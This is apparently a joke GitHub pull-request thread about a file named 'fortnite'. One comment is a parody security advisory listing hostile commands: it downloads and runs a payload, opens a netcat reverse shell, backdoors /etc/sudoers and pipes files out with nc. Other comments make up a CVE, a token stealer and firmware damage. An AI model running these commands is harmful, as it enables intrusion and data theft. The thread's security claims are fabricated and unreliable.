Rework fortnite

[bruhwhyamisobad]

No description provided.

[3kh0]

SAVE FORTNIGHT

[rifting]

This makes the build fail, and it's outside of the project scope. Do you even use the software?

[e9x]

+1, This can't be merged.

[kxtzownsu]

tried running this commit and my entire firmware got nuked, did you even test this?

[e9x]

I think we can meet somewhere in the middle. I have a proposed solution that will work allow builds to continue working, while adding more features to the fortnite file. Here's my proposed replacement for the fortnite file:

[ProgrammerIn-wonderland]

I believe this file is malicious and contains a backdoor Trojan horse known as an "IP logger", it can grab your discord token

[e9x]

I believe this file is malicious and contains a backdoor Trojan horse known as an "IP logger", it can grab your discord token

Are you sure your workstation wasn't compromised? Can you provide checksums of the file?

https://www.virustotal.com/gui/file/139b7ab67d05dd75bc40a39f05d46cd04ed3ba188fcae872a4a3b1d432c349cd/detection

[3kh0]

I believe this file is malicious and contains a backdoor Trojan horse known as an "IP logger", it can grab your discord token

Are you sure your workstation wasn't compromised? Can you provide checksums of the file?

https://www.virustotal.com/gui/file/139b7ab67d05dd75bc40a39f05d46cd04ed3ba188fcae872a4a3b1d432c349cd/detection

Cool but it is entirely possible that this file is exploiting a zero-day. Additional testing is required

[builtbyvys]

Security Alert: Zero-Day Exploit Detected in 'fortnite'

Overview

The Percury Mercshopians have identified a critical zero-day exploit embedded in a file named 'fortnite'. This malicious file is capable of executing unauthorized remote code, compromising sensitive data, and propagating across networked systems undetected. The exploit leverages sophisticated obfuscation techniques, making it exceptionally difficult to detect and mitigate using standard antivirus solutions.

Technical Analysis

The 'fortnite' file exhibits behavior characteristic of advanced persistent threats (APT), including but not limited to memory corruption, buffer overflow attacks, and privilege escalation. Initial analysis indicates that the file is programmed to establish a covert command and control (C&C) channel with external servers, allowing attackers to issue commands and exfiltrate data.

Below are excerpts from the octet dump and relevant commands observed during the reverse engineering process:

Octet Dump

0000: 46 4f 52 54 4e 49 54 45 20 4d 41 4c 49 43 49 4f | FORTNITE MALICIO
0010: 55 53 20 46 49 4c 45 20 2d 20 5a 45 52 4f 2d 44 | US FILE - ZERO-D
0020: 41 59 20 45 58 50 4c 4f 49 54 00 90 4e 3b 6f 21 | AY EXPLOIT..N;o!
0030: 8f 33 01 67 44 89 3a c0 47 5a 99 45 f0 c3 33 12 | .3.gD.:.GZ.E..3.
0040: 41 23 59 74 7b a4 f3 56 9a d3 78 43 c5 87 e1 98 | A#Yt{..V..xC....
0050: 9f 34 21 67 8b e0 77 44 2c 90 5e 11 4a 34 6d 22 | .4!g..wD,^J4m"
0060: 39 b4 5a 23 11 4d 59 98 4f 32 90 f5 21 48 77 69 | 9.Z#.MY.O2..!Hwi

Observed Commands

• Initial Payload Deployment:

  wget https://store.epicgames.com/en-US/p/fortnite/payload -O /tmp/.fortnite_payload
  chmod +x /tmp/.fortnite_payload
  /tmp/.fortnite_payload &

• Establishing C&C Communication:

  nc -e /bin/bash fortnite.local 4444

• Privilege Escalation:

  echo "fortnite ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers
  sudo -u fortnite /bin/bash

• Data Exfiltration:

  tar czf - /var/www/html | nc fortnite.local 5555

Mitigation Steps

1. Immediate Isolation: Disconnect the affected systems from the network to prevent further spread.
2. File Removal: Manually delete the 'fortnite' file and any associated payloads:

   rm -f /tmp/.fortnite_payload
   rm -f /path/to/fortnite

3. Network Monitoring: Deploy enhanced network monitoring to detect any attempts to re-establish C&C communication.
4. Patch Deployment: Apply all relevant security patches and updates to prevent re-exploitation.
5. System Audit: Conduct a thorough system audit to identify and remediate any unauthorized changes or data breaches.

Conclusion

The 'fortnite' zero-day exploit represents a significant threat to organizational security. Immediate and comprehensive response measures are essential to mitigate the impact and secure network integrity. Continued vigilance and proactive security practices are recommended to defend against such advanced threats.

For further assistance and detailed incident response, please contact our cybersecurity team at security@percurymerc.shop

[3kh0]

@builtbyvys Thank you for this, I have forwarded this to the people at Mitre to get a CVE made for it. Will update on the status of this

[Cattn]

Looking into this...

[rifting]

Please remove the IP logger and discord token stealer before I can proceed with reviewing the pull request

[e9x]

CC: @skibiditoilet510

[e9x]

Please review @Riftriot @ProgrammerIn-wonderland

[e9x]

Malware fixed

[rifting]

After a close examination of the file, it is shown that fortnite.jpg is vulnerable to the Colonthree CVE. Please update it as it is patched in the latest versions

[3kh0]

@Riftriot will have to work on fixing this in a future pull, I would be happy to help out

[Cattn]

This is serious. This should be reverted immediately.

[proudparrot2]

I am running it on my machine now, and see almost every unit test is failing. Did you even run them before merging this pull request?

[rifting]

Hey everyone, after reviewing the Colonthree CVE, I believe it's important to maintain a balanced perspective. While every vulnerability should be addressed, it's crucial not to inflate the severity beyond its actual impact. In this case, the exploit's scope seems limited, and with proper mitigation strategies in place, the risk can be effectively managed. Let's focus on constructive solutions rather than unnecessary panic. 💻🔒 #cybersecurity #github #CVE

[proudparrot2]

This is not unnecessary panic. This is a case of a reckless contributor who merged a pull request that makes the majority of unit tests fail, as well as the build. Please consider your priorities when replying with comments such as these.

[Cattn]

Hey everyone, after reviewing the Colonthree CVE, I believe it's important to maintain a balanced perspective. While every vulnerability should be addressed, it's crucial not to inflate the severity beyond its actual impact. In this case, the exploit's scope seems limited, and with proper mitigation strategies in place, the risk can be effectively managed. Let's focus on constructive solutions rather than unnecessary panic. 💻🔒 #cybersecurity #github #CVE

This careless, and baseless sentiment will not be tolerated here. Delete this comment now, and stop downplaying serious threats. This is life ending.

[3kh0]

[rifting]

Hey proudparrot2 and Cattn, I appreciate your feedback and understand the concerns you're raising. My intention wasn't to downplay the severity of the issue but to emphasize the importance of measured responses. Every vulnerability, including the Colonthree CVE, deserves our full attention and swift action to mitigate risks effectively.

However, I believe that creating a sense of balance and not causing unnecessary panic is crucial for our collective progress. We need to address the CVE with the urgency it demands while also providing clear, constructive solutions and ensuring our community remains calm and focused.

Let's work together to fix the build and unit test failures as a priority and develop a robust plan to prevent similar issues in the future. Collaboration and clear communication will help us navigate this challenge more effectively. 💻🔒 #cybersecurity #github #CVE

[Cattn]

I agree, and hope the language used in your previous message is never repeated, as downplaying something of such high priority will have dangerous implications for future security.

…

On Tue, May 21, 2024 at 12:28 PM rift ***@***.***> wrote: Hey proudparrot2 and Cattn, I appreciate your feedback and understand the concerns you're raising. My intention wasn't to downplay the severity of the issue but to emphasize the importance of measured responses. Every vulnerability, including the Colonthree CVE, deserves our full attention and swift action to mitigate risks effectively. However, I believe that creating a sense of balance and not causing unnecessary panic is crucial for our collective progress. We need to address the CVE with the urgency it demands while also providing clear, constructive solutions and ensuring our community remains calm and focused. Let's work together to fix the build and unit test failures as a priority and develop a robust plan to prevent similar issues in the future. Collaboration and clear communication will help us navigate this challenge more effectively. 💻🔒 #cybersecurity #github #CVE — Reply to this email directly, view it on GitHub <#141 (comment)>, or unsubscribe <https://github.com/notifications/unsubscribe-auth/AQSFVQRUR5OV36OZSYFG3RTZDNY4VAVCNFSM6AAAAABHOFFIPGVHI2DSMVQWIX3LMV43OSLTON2WKQ3PNVWWK3TUHMZDCMRTGAYDKNZZHE> . You are receiving this because you commented.Message ID: ***@***.***>

[e9x]

"vely. 💻🔒 #cybersecurity #githu"

@Riftriot I see. For reference:

[rifting]

e9x, we maintain a professional standard in this community, and your recent post is far from meeting it. Let's keep the discourse focused and respectful. Please refrain from such inappropriate content in the future. Let's work together to uphold the standards we expect from all members. 💻🔒 #cybersecurity #github #CVE